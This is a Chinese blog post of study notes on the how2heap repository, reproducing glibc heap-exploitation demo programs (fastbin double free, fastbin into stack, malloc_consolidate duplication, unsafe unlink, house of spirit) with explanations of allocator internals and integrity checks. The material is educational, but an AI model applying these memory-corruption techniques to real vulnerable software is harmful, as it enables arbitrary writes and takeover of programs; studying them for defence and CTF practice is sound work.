

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" href="/img/favicon.ico">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2b2b2b">
  <meta name="author" content="yb">
  <meta name="keywords" content="">
  
    <meta name="description" content="first_fit.c #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt;  int main() &#123;         fprintf(stderr, &quot;This file doesn&#39;t demonstrate an attack, but shows the na">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap 学习笔记">
<meta property="og:url" content="https://ybwa.github.io/p/134d140d/index.html">
<meta property="og:site_name" content="YB">
<meta property="og:description" content="first_fit.c #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt;  int main() &#123;         fprintf(stderr, &quot;This file doesn&#39;t demonstrate an attack, but shows the na">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-01-28T06:15:03.000Z">
<meta property="article:modified_time" content="2026-03-28T18:01:12.000Z">
<meta property="article:author" content="yb">
<meta property="article:tag" content="Heap">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>how2heap 学习笔记 - YB</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/KaTeX/0.16.2/katex.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ybwa.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"❡"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>YB</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="how2heap 学习笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-01-28 14:15" pubdate>
          2026年1月28日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          20 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">how2heap 学习笔记</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="first_fitc"><a class="markdownIt-Anchor" href="#first_fitc"></a> first_fit.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main()
&#123;
        fprintf(stderr, &quot;This file doesn&#39;t demonstrate an attack, but shows the nature of glibc&#39;s allocator.\n&quot;);
        fprintf(stderr, &quot;glibc uses a first-fit algorithm to select a free chunk.\n&quot;);
        fprintf(stderr, &quot;If a chunk is free and large enough, malloc will select this chunk.\n&quot;);
        fprintf(stderr, &quot;This can be exploited in a use-after-free situation.\n&quot;);

        fprintf(stderr, &quot;Allocating 2 buffers. They can be large, don&#39;t have to be fastbin.\n&quot;);
        char* a &#x3D; malloc(0x512);
        char* b &#x3D; malloc(0x256);
        char* c;

        fprintf(stderr, &quot;1st malloc(0x512): %p\n&quot;, a);
        fprintf(stderr, &quot;2nd malloc(0x256): %p\n&quot;, b);
        fprintf(stderr, &quot;we could continue mallocing here...\n&quot;);
        fprintf(stderr, &quot;now let&#39;s put a string at a that we can read later \&quot;this is A!\&quot;\n&quot;);
        strcpy(a, &quot;this is A!&quot;);
        fprintf(stderr, &quot;first allocation %p points to %s\n&quot;, a, a);

        fprintf(stderr, &quot;Freeing the first one...\n&quot;);
        free(a);

        fprintf(stderr, &quot;We don&#39;t need to free anything again. As long as we allocate smaller than 0x512, it will end up at %p\n&quot;, a);

        fprintf(stderr, &quot;So, let&#39;s allocate 0x500 bytes\n&quot;);
        c &#x3D; malloc(0x500);
        fprintf(stderr, &quot;3rd malloc(0x500): %p\n&quot;, c);
        fprintf(stderr, &quot;And put a different string here, \&quot;this is C!\&quot;\n&quot;);
        strcpy(c, &quot;this is C!&quot;);
        fprintf(stderr, &quot;3rd allocation %p points to %s\n&quot;, c, c);
        fprintf(stderr, &quot;first allocation %p points to %s\n&quot;, a, a);
        fprintf(stderr, &quot;If we reuse the first allocation, it now holds the data from the third allocation.\n&quot;);
&#125;</code></pre></div></figure>
<p>Heap 由若干个chunk 构成，chunk 的第一个 qword 表示前一个 chunk 的大小，第二个 qword 表示当前 chunk 的大小，第三个 qword 开始存储用户的数据。</p>
<p>由于 chunk 向 16 位（或 8 位）对齐，chunk 大小的最后 3 位必定为 0，用以存储标志位 AMP，其中最低位 P 表示 PREV_INUSE，前一 chunk 是否被使用（1/0）。</p>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">struct malloc_chunk &#123;

  INTERNAL_SIZE_T      prev_size;  &#x2F;* Size of previous chunk (if free).  *&#x2F;
  INTERNAL_SIZE_T      size;       &#x2F;* Size in bytes, including overhead. *&#x2F;

  struct malloc_chunk* fd;         &#x2F;* double links -- used only if free. *&#x2F;
  struct malloc_chunk* bk;

  &#x2F;* Only used for large blocks: pointer to next larger size.  *&#x2F;
  struct malloc_chunk* fd_nextsize; &#x2F;* double links -- used only if free. *&#x2F;
  struct malloc_chunk* bk_nextsize;
&#125;;</code></pre></div></figure>
<p>chunk 被分配后从 <code>fd</code> 开始存储用户数据，空闲时 <code>fd</code> 和 <code>bk</code> 分别指向前后空闲的 chunk，用于维护一个空闲 chunk 的列表.</p>
<p><code>malloc</code> 会向 Heap 中请求一块 chunk，分配器会从空闲堆链表头部开始遍历，找到第一块足够大的 chunk 就会分配（first_fit），多余的部分会分割成一个新的空闲 chunk。</p>
<h2 id="fastbin_dupc"><a class="markdownIt-Anchor" href="#fastbin_dupc"></a> fastbin_dup.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">int main()
&#123;
        fprintf(stderr, &quot;This file demonstrates a simple double-free attack with fastbins.\n&quot;);

        fprintf(stderr, &quot;Allocating 3 buffers.\n&quot;);
        int *a &#x3D; malloc(8);
        int *b &#x3D; malloc(8);
        int *c &#x3D; malloc(8);

        fprintf(stderr, &quot;1st malloc(8): %p\n&quot;, a);
        fprintf(stderr, &quot;2nd malloc(8): %p\n&quot;, b);
        fprintf(stderr, &quot;3rd malloc(8): %p\n&quot;, c);

        fprintf(stderr, &quot;Freeing the first one...\n&quot;);
        free(a);

        fprintf(stderr, &quot;If we free %p again, things will crash because %p is at the top of the free list.\n&quot;, a, a);
        &#x2F;&#x2F; free(a);

        fprintf(stderr, &quot;So, instead, we&#39;ll free %p.\n&quot;, b);
        free(b);

        fprintf(stderr, &quot;Now, we can free %p again, since it&#39;s not the head of the free list.\n&quot;, a);
        free(a);

        fprintf(stderr, &quot;Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we&#39;ll get %p twice!\n&quot;, a, b, a, a);
        a &#x3D; malloc(8);
        b &#x3D; malloc(8);
        c &#x3D; malloc(8);
        fprintf(stderr, &quot;1st malloc(8): %p\n&quot;, a);
        fprintf(stderr, &quot;2nd malloc(8): %p\n&quot;, b);
        fprintf(stderr, &quot;3rd malloc(8): %p\n&quot;, c);
&#125;</code></pre></div></figure>
<p>为了提高效率，较小的 chunk 释放后会被存入 fastbin，fastbin 中的 chunk 的 <code>inuse</code> 位依旧为 1 不会与其他 chunk 合并。</p>
<p>fastbin 为了快速响应频繁的小内存申请，采用 单向链表和 <strong>LIFO</strong> 维护。</p>
<p>glibc 的 <code>free()</code> 有一个检测：当释放指针是 fastbin 链表头时会使得程序崩溃。</p>
<p>但当释放指针不是表头时，就没有这个问题了，它将被第二次放入链表中。</p>
<p>此时使用 <code>malloc()</code> 分配，将会得到相同的两个 chunk。</p>
<h2 id="fastbin_dup_into_stackc"><a class="markdownIt-Anchor" href="#fastbin_dup_into_stackc"></a> fastbin_dup_into_stack.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">int main()
&#123;
        fprintf(stderr, &quot;This file extends on fastbin_dup.c by tricking malloc into\n&quot;
               &quot;returning a pointer to a controlled location (in this case, the stack).\n&quot;);

        unsigned long long stack_var;

        fprintf(stderr, &quot;The address we want malloc() to return is %p.\n&quot;, 8+(char *)&amp;stack_var);

        int *a &#x3D; malloc(8);
        int *b &#x3D; malloc(8);
        int *c &#x3D; malloc(8);
        free(a), free(b), free(a);

        fprintf(stderr, &quot;Now the free list has [ %p, %p, %p ]. &quot;
                &quot;We&#39;ll now carry out our attack by modifying data at %p.\n&quot;, a, b, a, a);
        unsigned long long *d &#x3D; malloc(8);

        fprintf(stderr, &quot;1st malloc(8): %p\n&quot;, d);
        fprintf(stderr, &quot;2nd malloc(8): %p\n&quot;, malloc(8));
        fprintf(stderr, &quot;Now the free list has [ %p ].\n&quot;, a);
        fprintf(stderr, &quot;Now, we have access to %p while it remains at the head of the free list.\n&quot;
                &quot;so now we are writing a fake free size (in this case, 0x20) to the stack,\n&quot;
                &quot;so that malloc will think there is a free chunk there and agree to\n&quot;
                &quot;return a pointer to it.\n&quot;, a);
        stack_var &#x3D; 0x20;

        fprintf(stderr, &quot;Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n&quot;, a);
        *d &#x3D; (unsigned long long) (((char*)&amp;stack_var) - sizeof(d));

        fprintf(stderr, &quot;3rd malloc(8): %p, putting the stack address on the free list\n&quot;, malloc(8));
        fprintf(stderr, &quot;4th malloc(8): %p\n&quot;, malloc(8));
&#125;</code></pre></div></figure>
<p>使用上一个的方法，做到修改一个在 fastbin 中的 chunk；如果此时将其的 <code>fd</code> 指向栈，就可以得到一个指向栈地址的指针。</p>
<p>为了绕过 size 检查，需要设置栈上地址的大小，在这里时 0x20。</p>
<h2 id="fastbin_dup_consolidatec"><a class="markdownIt-Anchor" href="#fastbin_dup_consolidatec"></a> fastbin_dup_consolidate.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;assert.h&gt;

&#x2F;*
Original reference: https:&#x2F;&#x2F;valsamaras.medium.com&#x2F;the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8

This document is mostly used to demonstrate malloc_consolidate and how it can be leveraged with a
double free to gain two pointers to the same large-sized chunk, which is usually difficult to do
directly due to the previnuse check. Interestingly this also includes tcache-sized chunks of certain sizes.

malloc_consolidate(https:&#x2F;&#x2F;elixir.bootlin.com&#x2F;glibc&#x2F;glibc-2.35&#x2F;source&#x2F;malloc&#x2F;malloc.c#L4714) essentially
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
if possible.

As of glibc version 2.35 it is called only in the following five places:
1. _int_malloc: A large sized chunk is being allocated
3. _int_free: If the chunk size is &gt;&#x3D; FASTBIN_CONSOLIDATION_THRESHOLD (65536)
2. _int_malloc: No bins were found for a chunk and top is too small
4. mtrim: Always
5. __libc_mallopt: Always

small bin (since we are trying to get into the &#39;else&#39; branch of this check: https:&#x2F;&#x2F;elixir.bootlin.com&#x2F;glibc&#x2F;glibc-2.35&#x2F;source&#x2F;malloc&#x2F;malloc.c#L3901).
We will be targeting the first place, so we will need to allocate a chunk that does not belong in the
This means our chunk will need to be of size &gt;&#x3D; 0x400 (it is thus large-sized). Notably, the
biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize
a double free to gain control of a tcache sized chunk.
*&#x2F;

#define CHUNK_SIZE 0x400

int main() &#123;
        printf(&quot;This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n&quot;);
        printf(&quot;Lets prepare to fill up the tcache in order to force fastbin usage...\n\n&quot;);

        void *ptr[7];

        for(int i &#x3D; 0; i &lt; 7; i++)
                ptr[i] &#x3D; malloc(0x40);

        void* p1 &#x3D; malloc(0x40);
        printf(&quot;Allocate another chunk of the same size p1&#x3D;%p \n&quot;, p1);

        printf(&quot;Fill up the tcache...\n&quot;);
        for(int i &#x3D; 0; i &lt; 7; i++)
                free(ptr[i]);

        printf(&quot;Now freeing p1 will add it to the fastbin.\n\n&quot;);
        free(p1);

        printf(&quot;To trigger malloc_consolidate we need to allocate a chunk with large chunk size (&gt;&#x3D; 0x400)\n&quot;);
        printf(&quot;which corresponds to request size &gt;&#x3D; 0x3f0. We will request 0x400 bytes, which will gives us\n&quot;);
        printf(&quot;a tcache-sized chunk with chunk size 0x410 &quot;);
        void* p2 &#x3D; malloc(CHUNK_SIZE);

        printf(&quot;p2&#x3D;%p.\n&quot;, p2);

        printf(&quot;\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n&quot;);
        printf(&quot;Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 &#x3D; p2.\n&quot;);

        assert(p1 &#x3D;&#x3D; p2);

        printf(&quot;We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n&quot;);
        free(p1); &#x2F;&#x2F; vulnerability (double free)
        printf(&quot;It is now in the tcache (or merged with top if we had initially chosen a chunk size &gt; 0x410).\n&quot;);

        printf(&quot;So p1 is double freed, and p2 hasn&#39;t been freed although it now points to a free chunk.\n&quot;);

        printf(&quot;We will request 0x400 bytes. This will give us the 0x410 chunk that&#39;s currently in\n&quot;);
        printf(&quot;the tcache bin. p2 and p1 will still be pointing to it.\n&quot;);
        void *p3 &#x3D; malloc(CHUNK_SIZE);

        assert(p3 &#x3D;&#x3D; p2);
        printf(&quot;We now have two pointers (p2 and p3) that haven&#39;t been directly freed\n&quot;);

        printf(&quot;and both point to the same tcache sized chunk. p2&#x3D;%p p3&#x3D;%p\n&quot;, p2, p3);
        printf(&quot;We have achieved duplication!\n\n&quot;);

        printf(&quot;Note: This duplication would have also worked with a larger chunk size, the chunks would\n&quot;);
        printf(&quot;have behaved the same, just being taken from the top instead of from the tcache bin.\n&quot;);
        printf(&quot;This is pretty cool because it is usually difficult to duplicate large sized chunks\n&quot;);
        printf(&quot;because they are resistant to direct double free&#39;s due to their PREV_INUSE check.\n&quot;);

        return 0;
&#125;

</code></pre></div></figure>
<p>通过 <code>malloc_consolidate</code> 与 double-free 组合以得到两个指针指向相同的 large-sized chunk。</p>
<p><code>malloc_consolidate</code> 将所有 fastbin 中的 chunk 与相邻块合并，放入 unsorted bin 或与 top chunk 合并。</p>
<p>glibc 2.35 中 <code>malloc_consolidate</code> 在以下五个地方被调用：</p>
<ul>
<li><code>_int_malloc</code>：一个 large chunk 被分配 <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965">CODE</a></li>
<li><code>_int_free</code>：chunk 大小大于等于 FASTBIN_CONSOLIDATION_THRESHOLD (65536) <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674">CODE</a></li>
<li><code>_int_malloc</code>：没有合适的 bin 来提供 chunk 且 top chunk 不够大<a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394">CODE</a></li>
<li><code>mtrim</code>：总是  <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5041">CODE</a></li>
<li><code>__libc_mallopt</code>：总是  <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5463">CODE</a></li>
</ul>
<p>想要在 <code>malloc</code> 中触发 <code>malloc_consolidate</code>，我们需要使分配的 chunk 的大小大于等于 0x400，即 large-sized。</p>
<p>同时，tcache-sized 的最大大小是 0x410，所以我们可以用这种方法来控制一个 tcache-sized chunk。</p>
<h2 id="unsafe_unlinkc"><a class="markdownIt-Anchor" href="#unsafe_unlinkc"></a> unsafe_unlink.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;stdint.h&gt;
#include &lt;assert.h&gt;

uint64_t *chunk0_ptr;

int main()
&#123;
        setbuf(stdout, NULL);
        printf(&quot;Welcome to unsafe unlink 2.0!\n&quot;);
        printf(&quot;Tested in Ubuntu 20.04 64bit.\n&quot;);
        printf(&quot;This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n&quot;);
        printf(&quot;The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n&quot;);

        int malloc_size &#x3D; 0x420; &#x2F;&#x2F;we want to be big enough not to use tcache or fastbin
        int header_size &#x3D; 2;

        printf(&quot;The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n&quot;);

        chunk0_ptr &#x3D; (uint64_t*) malloc(malloc_size); &#x2F;&#x2F;chunk0
        uint64_t *chunk1_ptr  &#x3D; (uint64_t*) malloc(malloc_size); &#x2F;&#x2F;chunk1
        printf(&quot;The global chunk0_ptr is at %p, pointing to %p\n&quot;, &amp;chunk0_ptr, chunk0_ptr);
        printf(&quot;The victim chunk we are going to corrupt is at %p\n\n&quot;, chunk1_ptr);

        printf(&quot;We create a fake chunk inside chunk0.\n&quot;);
        printf(&quot;We setup the size of our fake chunk so that we can bypass the check introduced in \n&quot;);
        chunk0_ptr[1] &#x3D; chunk0_ptr[-1] - 0x10;
        printf(&quot;We setup the &#39;next_free_chunk&#39; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk &#x3D; P.\n&quot;);
        chunk0_ptr[2] &#x3D; (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3);
        printf(&quot;We setup the &#39;previous_free_chunk&#39; (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd &#x3D; P.\n&quot;);
        printf(&quot;With this setup we can pass this check: (P-&gt;fd-&gt;bk !&#x3D; P || P-&gt;bk-&gt;fd !&#x3D; P) &#x3D;&#x3D; False\n&quot;);
        chunk0_ptr[3] &#x3D; (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*2);
        printf(&quot;Fake chunk fd: %p\n&quot;,(void*) chunk0_ptr[2]);
        printf(&quot;Fake chunk bk: %p\n\n&quot;,(void*) chunk0_ptr[3]);

        printf(&quot;We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n&quot;);
        uint64_t *chunk1_hdr &#x3D; chunk1_ptr - header_size;
        printf(&quot;We shrink the size of chunk0 (saved as &#39;previous_size&#39; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n&quot;);
        printf(&quot;It&#39;s important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n&quot;);
        chunk1_hdr[0] &#x3D; malloc_size;
        printf(&quot;If we had &#39;normally&#39; freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n&quot;,(void*)chunk1_hdr[0]);
        printf(&quot;We mark our fake chunk as free by setting &#39;previous_in_use&#39; of chunk1 as False.\n\n&quot;);
        chunk1_hdr[1] &amp;&#x3D; ~1;

        printf(&quot;Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n&quot;);
        printf(&quot;You can find the source of the unlink_chunk function at \n\n&quot;);
        free(chunk1_ptr);

        printf(&quot;At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n&quot;);
        char victim_string[8];
        strcpy(victim_string,&quot;Hello!~&quot;);
        chunk0_ptr[3] &#x3D; (uint64_t) victim_string;

        printf(&quot;chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n&quot;);
        printf(&quot;Original value: %s\n&quot;,victim_string);
        chunk0_ptr[0] &#x3D; 0x4141414142424242LL;
        printf(&quot;New Value: %s\n&quot;,victim_string);

        &#x2F;&#x2F; sanity check
        assert(*(long *)victim_string &#x3D;&#x3D; 0x4141414142424242L);
&#125;</code></pre></div></figure>
<p><s>woc这是哪个天才想出来的太尼玛妙了</s></p>
<p>使用了以下机制：当你 <code>free</code> 一个 chunk 时，如果它相邻的 chunk 是空闲的，系统会把这个 chunk 从双向链表中 <code>unlink</code> 并合并，即：</p>
<ul>
<li><code>P -&gt; fd -&gt; bk = P -&gt; bk</code></li>
<li><code>P -&gt; bk -&gt; fd = P -&gt; fd</code></li>
</ul>
<p>通过这种方式达成修改指针的目的。</p>
<p>但是不能单纯的修改一个 chunk 的 fd 和 bk，只要是因为以下两个检查：</p>
<ol>
<li><code>(P -&gt; fd -&gt; bk == P) &amp;&amp; (P -&gt; bk -&gt; fd == P)</code></li>
<li><code>prev_size(P) == chunk_size(P - prev_size(P))</code></li>
</ol>
<p>发现到 <code>chunk0_ptr</code> 是一个现成的指针指向了堆中的一个位置，我们由此展开就可以构造一个 fake chunk 来通过上面的两个检查。</p>
<p>此时 <code>free</code> chunk1 后，即可使得 <code>chunk0_ptr</code> 指向 <code>&amp;chunk0_ptr - 3</code>，通过让其写入自己来完成 arb write。</p>
<p><a target="_blank" rel="noopener" href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1ecba1fafc160ca70f81211b23f688df8676e612">Unlink</a></p>
<p><a target="_blank" rel="noopener" href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f">Check for corrupt prev_size vs size.</a></p>
<h2 id="house_of_spiritc"><a class="markdownIt-Anchor" href="#house_of_spiritc"></a> house_of_spirit.c</h2>
<figure><div class="code-wrapper"><pre class="language-cpp" data-language="cpp"><code class="language-cpp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;assert.h&gt;

int main()
&#123;
        setbuf(stdout, NULL);

        puts(&quot;This file demonstrates the house of spirit attack.&quot;);
        puts(&quot;This attack adds a non-heap pointer into fastbin, thus leading to (nearly) arbitrary write.&quot;);
        puts(&quot;Required primitives: known target address, ability to set up the start&#x2F;end of the target memory&quot;);

        puts(&quot;\nStep 1: Allocate 7 chunks and free them to fill up tcache&quot;);
        void *chunks[7];
        for(int i&#x3D;0; i&lt;7; i++) &#123;
                chunks[i] &#x3D; malloc(0x30);
        &#125;
        for(int i&#x3D;0; i&lt;7; i++) &#123;
                free(chunks[i]);
        &#125;

        puts(&quot;\nStep 2: Prepare the fake chunk&quot;);
        &#x2F;&#x2F; This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
        long fake_chunks[10] __attribute__ ((aligned (0x10)));
        printf(&quot;The target fake chunk is at %p\n&quot;, fake_chunks);
        printf(&quot;It contains two chunks. The first starts at %p and the second at %p.\n&quot;, &amp;fake_chunks[1], &amp;fake_chunks[9]);
        printf(&quot;This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (&lt;&#x3D; 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n&quot;);
        puts(&quot;... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.&quot;);
        fake_chunks[1] &#x3D; 0x40; &#x2F;&#x2F; this is the size
    printf(&quot;Now set the size of the chunk (%p) to 0x40 so malloc will think it is a valid chunk.\n&quot;, &amp;fake_chunks[1]);

        printf(&quot;The chunk.size of the *next* fake region has to be sane. That is &gt; 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem (&lt; 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n&quot;);
        printf(&quot;Set the size of the chunk (%p) to 0x1234 so freeing the first chunk can succeed.\n&quot;, &amp;fake_chunks[9]);
        fake_chunks[9] &#x3D; 0x1234; &#x2F;&#x2F; nextsize

        puts(&quot;\nStep 3: Free the first fake chunk&quot;);
        puts(&quot;Note that the address of the fake chunk must be 16-byte aligned.\n&quot;);
        void *victim &#x3D; &amp;fake_chunks[2];
        free(victim);

        puts(&quot;\nStep 4: Take out the fake chunk&quot;);
        printf(&quot;Now the next calloc will return our fake chunk at %p!\n&quot;, &amp;fake_chunks[2]);
        printf(&quot;malloc can do the trick as well, you just need to do it for 8 times.&quot;);
        void *allocated &#x3D; calloc(1, 0x30);
        printf(&quot;malloc(0x30): %p, fake chunk: %p\n&quot;, allocated, victim);

        assert(allocated &#x3D;&#x3D; victim);
&#125;
</code></pre></div></figure>
